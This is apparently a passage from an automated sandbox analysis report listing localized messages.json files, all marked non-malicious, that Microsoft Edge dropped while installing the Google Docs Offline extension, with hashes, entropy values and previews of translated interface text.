                                                                                                                                                                                                                                                                        Preview:{"createnew":{"message":"\u0eaa\u0ec9\u0eb2\u0e87\u0ec3\u0edd\u0ec8"},"explanationofflinedisabled":{"message":"\u0e97\u0ec8\u0eb2\u0e99\u0ead\u0ead\u0e9a\u0ea5\u0eb2\u0e8d\u0ea2\u0eb9\u0ec8. \u0ec0\u0e9e\u0eb7\u0ec8\u0ead\u0ec3\u0e8a\u0ec9 Google Docs \u0ec2\u0e94\u0e8d\u0e9a\u0ecd\u0ec8\u0ec0\u0e8a\u0eb7\u0ec8\u0ead\u0ea1\u0e95\u0ecd\u0ec8\u0ead\u0eb4\u0e99\u0ec0\u0e95\u0eb5\u0ec0\u0e99\u0eb1\u0e94, \u0ec3\u0eab\u0ec9\u0ec4\u0e9b\u0e97\u0eb5\u0ec8\u0e81\u0eb2\u0e99\u0e95\u0eb1\u0ec9\u0e87\u0e84\u0ec8\u0eb2\u0ec3\u0e99\u0edc\u0ec9\u0eb2 Google Docs \u0ec1\u0ea5\u0ec9\u0ea7\u0ec0\u0e9b\u0eb5\u0e94\u0ec3\u0e8a\u0ec9\u0e81\u0eb2\u0e99\u0e8a\u0eb4\u0ec9\u0e87\u0ec1\u0e9a\u0e9a\u0ead\u0ead\u0e9a\u0ea5\u0eb2\u0e8d\u0ec3\u0e99\u0ec0\u0e97\u0eb7\u0ec8\u0ead\u0e95\u0ecd\u0ec8\u0ec4\u0e9b\u0e97\u0eb5\u0ec8\u0e97\u0ec8\u0eb2\u0e99\u0ec0\u0e8a\u0eb7\u0ec8\u0ead\u0ea1\u0e95\u0ecd\u0ec8\u0ead\u0eb4\u0e99\u0ec0\u0e95\u0eb5\u0ec0\u0e99\u0eb1\u0e94."},"explanationofflineenabled":{"message":"\u0e97\u0ec

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5500_395530944\CRX_INSTALL\_locales\lt\messages.json

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1028
                                                                                                                                                                                                                                                                        Entropy (8bit):4.797571191712988
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24:1HAivZZaJ3Rje394+k7IKgpAJjUpSkiQjuRBMd:fZZahBeu7IKgqeMg
                                                                                                                                                                                                                                                                        MD5:970544AB4622701FFDF66DC556847652
                                                                                                                                                                                                                                                                        SHA1:14BEE2B77EE74C5E38EBD1DB09E8D8104CF75317
                                                                                                                                                                                                                                                                        SHA-256:5DFCBD4DFEAEC3ABE973A78277D3BD02CD77AE635D5C8CD1F816446C61808F59
                                                                                                                                                                                                                                                                        SHA-512:CC12D00C10B970189E90D47390EEB142359A8D6F3A9174C2EF3AE0118F09C88AB9B689D9773028834839A7DFAF3AAC6747BC1DCB23794A9F067281E20B8DC6EA
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "SUKURTI NAUJ.".. },.. "explanationofflinedisabled": {.. "message": "Esate neprisijung.. Jei norite naudoti .Google. dokumentus be interneto ry.io, pagrindiniame .Google. dokument. puslapyje eikite . nustatym. skilt. ir .junkite sinchronizavim. neprisijungus, kai kit. kart. b.site prisijung. prie interneto.".. },.. "explanationofflineenabled": {.. "message": "Esate neprisijung., bet vis tiek galite redaguoti pasiekiamus failus arba sukurti nauj..".. },.. "extdesc": {.. "message": "Redaguokite, kurkite ir per.i.r.kite savo dokumentus, skai.iuokles ir pristatymus . visk. darykite be prieigos prie interneto.".. },.. "extname": {.. "message": ".Google. dokumentai neprisijungus".. },.. "learnmore": {.. "message": "Su.inoti daugiau".. },.. "popuphelptext": {.. "message": "Ra.ykite, redaguokite ir bendradarbiaukite bet kurioje vietoje naudodami interneto ry.. arba

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5500_395530944\CRX_INSTALL\_locales\lv\messages.json

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):994
                                                                                                                                                                                                                                                                        Entropy (8bit):4.700308832360794
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24:1HAaJ7a/uNpoB/Y4vPnswSPkDzLKFQHpp//BpPDB:7J7a/uzQ/Y4vvswhDzDr/LDB
                                                                                                                                                                                                                                                                        MD5:A568A58817375590007D1B8ABCAEBF82
                                                                                                                                                                                                                                                                        SHA1:B0F51FE6927BB4975FC6EDA7D8A631BF0C1AB597
                                                                                                                                                                                                                                                                        SHA-256:0621DE9161748F45D53052ED8A430962139D7F19074C7FFE7223ECB06B0B87DB
                                                                                                                                                                                                                                                                        SHA-512:FCFBADEC9F73975301AB404DB6B09D31457FAC7CCAD2FA5BE348E1CAD6800F87CB5B56DE50880C55BBADB3C40423351A6B5C2D03F6A327D898E35F517B1C628C
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "IZVEIDOT JAUNU".. },.. "explanationofflinedisabled": {.. "message": "J.s esat bezsaist.. Lai lietotu pakalpojumu Google dokumenti bez interneta savienojuma, n.kamaj. reiz., kad ir izveidots savienojums ar internetu, atveriet Google dokumentu s.kumlapas iestat.jumu izv.lni un iesl.dziet sinhroniz.ciju bezsaist..".. },.. "explanationofflineenabled": {.. "message": "J.s esat bezsaist., ta.u varat redi..t pieejamos failus un izveidot jaunus.".. },.. "extdesc": {.. "message": "Redi..jiet, veidojiet un skatiet savus dokumentus, izkl.jlapas un prezent.cijas, neizmantojot savienojumu ar internetu.".. },.. "extname": {.. "message": "Google dokumenti bezsaist.".. },.. "learnmore": {.. "message": "Uzziniet vair.k".. },.. "popuphelptext": {.. "message": "Rakstiet, redi..jiet un sadarbojieties ar interneta savienojumu vai bez t. neatkar.gi no t., kur atrodaties.".. }..}..

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5500_395530944\CRX_INSTALL\_locales\ml\messages.json

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):2091
                                                                                                                                                                                                                                                                        Entropy (8bit):4.358252286391144
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24:1HAnHdGc4LtGxVY6IuVzJkeNL5kP13a67wNcYP8j5PIaSTIjPU4ELFPCWJjMupV/:idGcyYPVtkAUl7wqziBsg9DbpN6XoN/
                                                                                                                                                                                                                                                                        MD5:4717EFE4651F94EFF6ACB6653E868D1A
                                                                                                                                                                                                                                                                        SHA1:B8A7703152767FBE1819808876D09D9CC1C44450
                                                                                                                                                                                                                                                                        SHA-256:22CA9415E294D9C3EC3384B9D08CDAF5164AF73B4E4C251559E09E529C843EA6
                                                                                                                                                                                                                                                                        SHA-512:487EAB4938F6BC47B1D77DD47A5E2A389B94E01D29849E38E96C95CABC7BD98679451F0E22D3FEA25C045558CD69FDDB6C4FEF7C581141F1C53C4AA17578D7F7
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "....... ............".. },.. "explanationofflinedisabled": {.. "message": "...... ........... ........... ............. ..... Google ....... ..........., Google ....... .......... ............. .... ...... ...... ... ............... .................... '.......... ................' .........".. },.. "explanationofflineenabled": {.. "message": "................., .......... ......... ....... ...... ..............

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5500_395530944\CRX_INSTALL\_locales\mn\messages.json

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):2778
                                                                                                                                                                                                                                                                        Entropy (8bit):3.595196082412897
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:48:Y943BFU1LQ4HwQLQ4LQhlmVQL3QUm6H6ZgFIcwn6Rs2ShpQ3IwjGLQSJ/PYoEQj8:I43BCymz8XNcfuQDXYN2sum
                                                                                                                                                                                                                                                                        MD5:83E7A14B7FC60D4C66BF313C8A2BEF0B
                                                                                                                                                                                                                                                                        SHA1:1CCF1D79CDED5D65439266DB58480089CC110B18
                                                                                                                                                                                                                                                                        SHA-256:613D8751F6CC9D3FA319F4B7EA8B2BD3BED37FD077482CA825929DD7C12A69A8
                                                                                                                                                                                                                                                                        SHA-512:3742E24FFC4B5283E6EE496813C1BDC6835630D006E8647D427C3DE8B8E7BF814201ADF9A27BFAB3ABD130B6FEC64EBB102AC0EB8DEDFE7B63D82D3E1233305D
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:{"createnew":{"message":"\u0428\u0418\u041d\u0418\u0419\u0413 \u04ae\u04ae\u0421\u0413\u042d\u0425"},"explanationofflinedisabled":{"message":"\u0422\u0430 \u043e\u0444\u043b\u0430\u0439\u043d \u0431\u0430\u0439\u043d\u0430. Google \u0414\u043e\u043a\u044b\u0433 \u0438\u043d\u0442\u0435\u0440\u043d\u044d\u0442\u0433\u04af\u0439\u0433\u044d\u044d\u0440 \u0430\u0448\u0438\u0433\u043b\u0430\u0445\u044b\u043d \u0442\u0443\u043b\u0434 \u0434\u0430\u0440\u0430\u0430\u0433\u0438\u0439\u043d \u0443\u0434\u0430\u0430 \u0438\u043d\u0442\u0435\u0440\u043d\u044d\u0442\u044d\u0434 \u0445\u043e\u043b\u0431\u043e\u0433\u0434\u043e\u0445\u0434\u043e\u043e Google \u0414\u043e\u043a\u044b\u043d \u043d\u04af\u04af\u0440 \u0445\u0443\u0443\u0434\u0430\u0441\u043d\u0430\u0430\u0441 \u0442\u043e\u0445\u0438\u0440\u0433\u043e\u043e \u0434\u043e\u0442\u043e\u0440\u0445 \u043e\u0444\u043b\u0430\u0439\u043d \u0441\u0438\u043d\u043a\u0438\u0439\u0433 \u0438\u0434\u044d\u0432\u0445\u0436\u04af\u04af\u043b\u043d\u0

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5500_395530944\CRX_INSTALL\_locales\mr\messages.json

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1719
                                                                                                                                                                                                                                                                        Entropy (8bit):4.287702203591075
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:48:65/5EKaDMw6pEf4I5+jSksOTJqQyrFO8C:65/5EKaAw6pEf4I5+vsOVqQyFO8C
                                                                                                                                                                                                                                                                        MD5:3B98C4ED8874A160C3789FEAD5553CFA
                                                                                                                                                                                                                                                                        SHA1:5550D0EC548335293D962AAA96B6443DD8ABB9F6
                                                                                                                                                                                                                                                                        SHA-256:ADEB082A9C754DFD5A9D47340A3DDCC19BF9C7EFA6E629A2F1796305F1C9A66F
                                                                                                                                                                                                                                                                        SHA-512:5139B6C6DF9459C7B5CDC08A98348891499408CD75B46519BA3AC29E99AAAFCC5911A1DEE6C3A57E3413DBD0FAE72D7CBC676027248DCE6364377982B5CE4151
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": ".... .... ...".. },.. "explanationofflinedisabled": {.. "message": "...... ...... ..... ......... ....... ....... ..... Google ....... ............, Google ....... .............. .......... .. ... ..... .... ...... ......... ...... ...... ...... .... .... ....".. },.. "explanationofflineenabled": {.. "message": "...... ...... ...., ..... ...... ...... ...... .... ....... ... ..... .... .... ... .....".. },.. "extdesc": {.. "message": "..... ..

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5500_395530944\CRX_INSTALL\_locales\ms\messages.json

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):936
                                                                                                                                                                                                                                                                        Entropy (8bit):4.457879437756106
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24:1HARXIqhmemNKsE27rhdfNLChtyo2JJ/YgTgin:iIqFC7lrDfNLCIBRzn
                                                                                                                                                                                                                                                                        MD5:7D273824B1E22426C033FF5D8D7162B7
                                                                                                                                                                                                                                                                        SHA1:EADBE9DBE5519BD60458B3551BDFC36A10049DD1
                                                                                                                                                                                                                                                                        SHA-256:2824CF97513DC3ECC261F378BFD595AE95A5997E9D1C63F5731A58B1F8CD54F9
                                                                                                                                                                                                                                                                        SHA-512:E5B611BBFAB24C9924D1D5E1774925433C65C322769E1F3B116254B1E9C69B6DF1BE7828141EEBBF7524DD179875D40C1D8F29C4FB86D663B8A365C6C60421A7
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "BUAT BAHARU".. },.. "explanationofflinedisabled": {.. "message": "Anda berada di luar talian. Untuk menggunakan Google Docs tanpa sambungan Internet, pergi ke tetapan di halaman utama Google Docs dan hidupkan penyegerakan luar talian apabila anda disambungkan ke Internet selepas ini.".. },.. "explanationofflineenabled": {.. "message": "Anda berada di luar talian, tetapi anda masih boleh mengedit fail yang tersedia atau buat fail baharu.".. },.. "extdesc": {.. "message": "Edit, buat dan lihat dokumen, hamparan dan pembentangan anda . kesemuanya tanpa akses Internet.".. },.. "extname": {.. "message": "Google Docs Luar Talian".. },.. "learnmore": {.. "message": "Ketahui Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit dan bekerjasama di mana-mana sahaja anda berada, dengan atau tanpa sambungan Internet.".. }..}..

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5500_395530944\CRX_INSTALL\_locales\my\messages.json

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):3830
                                                                                                                                                                                                                                                                        Entropy (8bit):3.5483353063347587
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:48:Ya+Ivxy6ur1+j3P7Xgr5ELkpeCgygyOxONHO3pj6H57ODyOXOVp6:8Uspsj3P3ty2a66xl09
                                                                                                                                                                                                                                                                        MD5:342335A22F1886B8BC92008597326B24
                                                                                                                                                                                                                                                                        SHA1:2CB04F892E430DCD7705C02BF0A8619354515513
                                                                                                                                                                                                                                                                        SHA-256:243BEFBD6B67A21433DCC97DC1A728896D3A070DC20055EB04D644E1BB955FE7
                                                                                                                                                                                                                                                                        SHA-512:CD344D060E30242E5A4705547E807CE3CE2231EE983BB9A8AD22B3E7598A7EC87399094B04A80245AD51D039370F09D74FE54C0B0738583884A73F0C7E888AD8
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:{"createnew":{"message":"\u1021\u101e\u1005\u103a \u1015\u103c\u102f\u101c\u102f\u1015\u103a\u101b\u1014\u103a"},"explanationofflinedisabled":{"message":"\u101e\u1004\u103a \u1021\u1031\u102c\u1037\u1016\u103a\u101c\u102d\u102f\u1004\u103a\u1038\u1016\u103c\u1005\u103a\u1014\u1031\u1015\u102b\u101e\u100a\u103a\u104b \u1021\u1004\u103a\u1010\u102c\u1014\u1000\u103a\u1001\u103b\u102d\u1010\u103a\u1006\u1000\u103a\u1019\u103e\u102f \u1019\u101b\u103e\u102d\u1018\u1032 Google Docs \u1000\u102d\u102f \u1021\u101e\u102f\u1036\u1038\u1015\u103c\u102f\u101b\u1014\u103a \u1014\u1031\u102c\u1000\u103a\u1010\u1005\u103a\u1000\u103c\u102d\u1019\u103a \u101e\u1004\u103a\u1021\u1004\u103a\u1010\u102c\u1014\u1000\u103a\u1001\u103b\u102d\u1010\u103a\u1006\u1000\u103a\u101e\u100a\u1037\u103a\u1021\u1001\u102b Google Docs \u1015\u1004\u103a\u1019\u1005\u102c\u1019\u103b\u1000\u103a\u1014\u103e\u102c\u101b\u103e\u102d \u1006\u1000\u103a\u1010\u1004\u103a\u1019\u103b\u102c\u1038\u101e\u102d\u102f\u1037\u1

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5500_395530944\CRX_INSTALL\_locales\ne\messages.json

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1898
                                                                                                                                                                                                                                                                        Entropy (8bit):4.187050294267571
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24:1HAmQ6ZSWfAx6fLMr48tE/cAbJtUZJScSIQoAfboFMiQ9pdvz48YgqG:TQ6W6MbkcAltUJxQdfbqQ9pp0gqG
                                                                                                                                                                                                                                                                        MD5:B1083DA5EC718D1F2F093BD3D1FB4F37
                                                                                                                                                                                                                                                                        SHA1:74B6F050D918448396642765DEF1AD5390AB5282
                                                                                                                                                                                                                                                                        SHA-256:E6ED0A023EF31705CCCBAF1E07F2B4B2279059296B5CA973D2070417BA16F790
                                                                                                                                                                                                                                                                        SHA-512:7102B90ABBE2C811E8EE2F1886A73B1298D4F3D5D05F0FFDB57CF78B9A49A25023A290B255BAA4895BB150B388BAFD9F8432650B8C70A1A9A75083FFFCD74F1A
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": ".... ....... .........".. },.. "explanationofflinedisabled": {.. "message": "..... ...... .......... .... ........ .... .... Google ........ ...... .... ..... ..... ... .......... ....... .... Google ........ .......... ..... .......... .. ...... ..... .... ..... ......... .. ..........".. },.. "explanationofflineenabled": {.. "message": "..... ...... ........., .. ..... ... ... ...... ....... ....... .. .... ....... ....

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5500_395530944\CRX_INSTALL\_locales\nl\messages.json

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):914
                                                                                                                                                                                                                                                                        Entropy (8bit):4.513485418448461
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:12:1HASvgFARCBxNBv52/fXjOXl6W6ICBxeBvMzU1CSUJAO6SFAIVIbCBhZHdb1tvz+:1HABJx4X6QDwEzlm2uGvYzKU
                                                                                                                                                                                                                                                                        MD5:32DF72F14BE59A9BC9777113A8B21DE6
                                                                                                                                                                                                                                                                        SHA1:2A8D9B9A998453144307DD0B700A76E783062AD0
                                                                                                                                                                                                                                                                        SHA-256:F3FE1FFCB182183B76E1B46C4463168C746A38E461FD25CA91FF2A40846F1D61
                                                                                                                                                                                                                                                                        SHA-512:E0966F5CCA5A8A6D91C58D716E662E892D1C3441DAA5D632E5E843839BB989F620D8AC33ED3EDBAFE18D7306B40CD0C4639E5A4E04DA2C598331DACEC2112AAD
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "NIEUW MAKEN".. },.. "explanationofflinedisabled": {.. "message": "Je bent offline. Wil je Google Documenten zonder internetverbinding gebruiken, ga dan de volgende keer dat je verbinding met internet hebt naar 'Instellingen' op de homepage van Google Documenten en zet 'Offline synchronisatie' aan.".. },.. "explanationofflineenabled": {.. "message": "Je bent offline, maar je kunt nog wel beschikbare bestanden bewerken of nieuwe bestanden maken.".. },.. "extdesc": {.. "message": "Bewerk, maak en bekijk je documenten, spreadsheets en presentaties. Allemaal zonder internettoegang.".. },.. "extname": {.. "message": "Offline Documenten".. },.. "learnmore": {.. "message": "Meer informatie".. },.. "popuphelptext": {.. "message": "Overal schrijven, bewerken en samenwerken, met of zonder internetverbinding.".. }..}..

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5500_395530944\CRX_INSTALL\_locales\nn\messages.json

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):851
                                                                                                                                                                                                                                                                        Entropy (8bit):4.4858053753176526
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                                                                                                                                        MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                                                                                                                                        SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                                                                                                                                        SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                                                                                                                                        SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5500_395530944\CRX_INSTALL\_locales\no\messages.json

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):878
                                                                                                                                                                                                                                                                        Entropy (8bit):4.4541485835627475
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24:1HAqwwrJ6wky68uk+NILxRGJwBvDyrj9V:nwwQwky6W+NwswVyT
                                                                                                                                                                                                                                                                        MD5:A1744B0F53CCF889955B95108367F9C8
                                                                                                                                                                                                                                                                        SHA1:6A5A6771DFF13DCB4FD425ED839BA100B7123DE0
                                                                                                                                                                                                                                                                        SHA-256:21CEFF02B45A4BFD60D144879DFA9F427949A027DD49A3EB0E9E345BD0B7C9A8
                                                                                                                                                                                                                                                                        SHA-512:F55E43F14514EECB89F6727A0D3C234149609020A516B193542B5964D2536D192F40CC12D377E70C683C269A1BDCDE1C6A0E634AA84A164775CFFE776536A961
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "OPPRETT NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du er uten nett. For . bruke Google Dokumenter uten internettilkobling, g. til innstillingene p. Google Dokumenter-nettsiden og sl. p. synkronisering uten nett neste gang du er koblet til Internett.".. },.. "explanationofflineenabled": {.. "message": "Du er uten nett, men du kan likevel endre tilgjengelige filer eller opprette nye.".. },.. "extdesc": {.. "message": "Rediger, opprett og se dokumentene, regnearkene og presentasjonene dine . uten nettilgang.".. },.. "extname": {.. "message": "Google Dokumenter uten nett".. },.. "learnmore": {.. "message": "Finn ut mer".. },.. "popuphelptext": {.. "message": "Skriv, rediger eller samarbeid uansett hvor du er, med eller uten internettilkobling.".. }..}..

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5500_395530944\CRX_INSTALL\_locales\pa\messages.json

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):2766
                                                                                                                                                                                                                                                                        Entropy (8bit):3.839730779948262
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:48:YEH6/o0iZbNCbDMUcipdkNtQjsGKIhO9aBjj/nxt9o5nDAj3:p6wbZbEbvJ8jQkIhO9aBjb/90Ab
                                                                                                                                                                                                                                                                        MD5:97F769F51B83D35C260D1F8CFD7990AF
                                                                                                                                                                                                                                                                        SHA1:0D59A76564B0AEE31D0A074305905472F740CECA
                                                                                                                                                                                                                                                                        SHA-256:BBD37D41B7DE6F93948FA2437A7699D4C30A3C39E736179702F212CB36A3133C
                                                                                                                                                                                                                                                                        SHA-512:D91F5E2D22FC2D7F73C1F1C4AF79DB98FCFD1C7804069AE9B2348CBC729A6D2DFF7FB6F44D152B0BDABA6E0D05DFF54987E8472C081C4D39315CEC2CBC593816
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:{"createnew":{"message":"\u0a28\u0a35\u0a3e\u0a02 \u0a2c\u0a23\u0a3e\u0a13"},"explanationofflinedisabled":{"message":"\u0a24\u0a41\u0a38\u0a40\u0a02 \u0a06\u0a2b\u0a3c\u0a32\u0a3e\u0a08\u0a28 \u0a39\u0a4b\u0964 \u0a07\u0a70\u0a1f\u0a30\u0a28\u0a48\u0a71\u0a1f \u0a15\u0a28\u0a48\u0a15\u0a36\u0a28 \u0a26\u0a47 \u0a2c\u0a3f\u0a28\u0a3e\u0a02 Google Docs \u0a28\u0a42\u0a70 \u0a35\u0a30\u0a24\u0a23 \u0a32\u0a08, \u0a05\u0a17\u0a32\u0a40 \u0a35\u0a3e\u0a30 \u0a1c\u0a26\u0a4b\u0a02 \u0a24\u0a41\u0a38\u0a40\u0a02 \u0a07\u0a70\u0a1f\u0a30\u0a28\u0a48\u0a71\u0a1f \u0a26\u0a47 \u0a28\u0a3e\u0a32 \u0a15\u0a28\u0a48\u0a15\u0a1f \u0a39\u0a4b\u0a35\u0a4b \u0a24\u0a3e\u0a02 Google Docs \u0a2e\u0a41\u0a71\u0a16 \u0a2a\u0a70\u0a28\u0a47 '\u0a24\u0a47 \u0a38\u0a48\u0a1f\u0a3f\u0a70\u0a17\u0a3e\u0a02 \u0a35\u0a3f\u0a71\u0a1a \u0a1c\u0a3e\u0a13 \u0a05\u0a24\u0a47 \u0a06\u0a2b\u0a3c\u0a32\u0a3e\u0a08\u0a28 \u0a38\u0a3f\u0a70\u0a15 \u0a28\u0a42\u0a70 \u0a1a\u0a3e\u0a32\u0a42 \u0a15\u0a30\u0a4b\u0964"},"expla

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5500_395530944\CRX_INSTALL\_locales\pl\messages.json

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):978
                                                                                                                                                                                                                                                                        Entropy (8bit):4.879137540019932
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24:1HApiJiRelvm3wi8QAYcbm24sK+tFJaSDD:FJMx3whxYcbNp
                                                                                                                                                                                                                                                                        MD5:B8D55E4E3B9619784AECA61BA15C9C0F
                                                                                                                                                                                                                                                                        SHA1:B4A9C9885FBEB78635957296FDDD12579FEFA033
                                                                                                                                                                                                                                                                        SHA-256:E00FF20437599A5C184CA0C79546CB6500171A95E5F24B9B5535E89A89D3EC3D
                                                                                                                                                                                                                                                                        SHA-512:266589116EEE223056391C65808255EDAE10EB6DC5C26655D96F8178A41E283B06360AB8E08AC3857D172023C4F616EF073D0BEA770A3B3DD3EE74F5FFB2296B
                                                                                                                                                                                                                                                                        Malicious:false
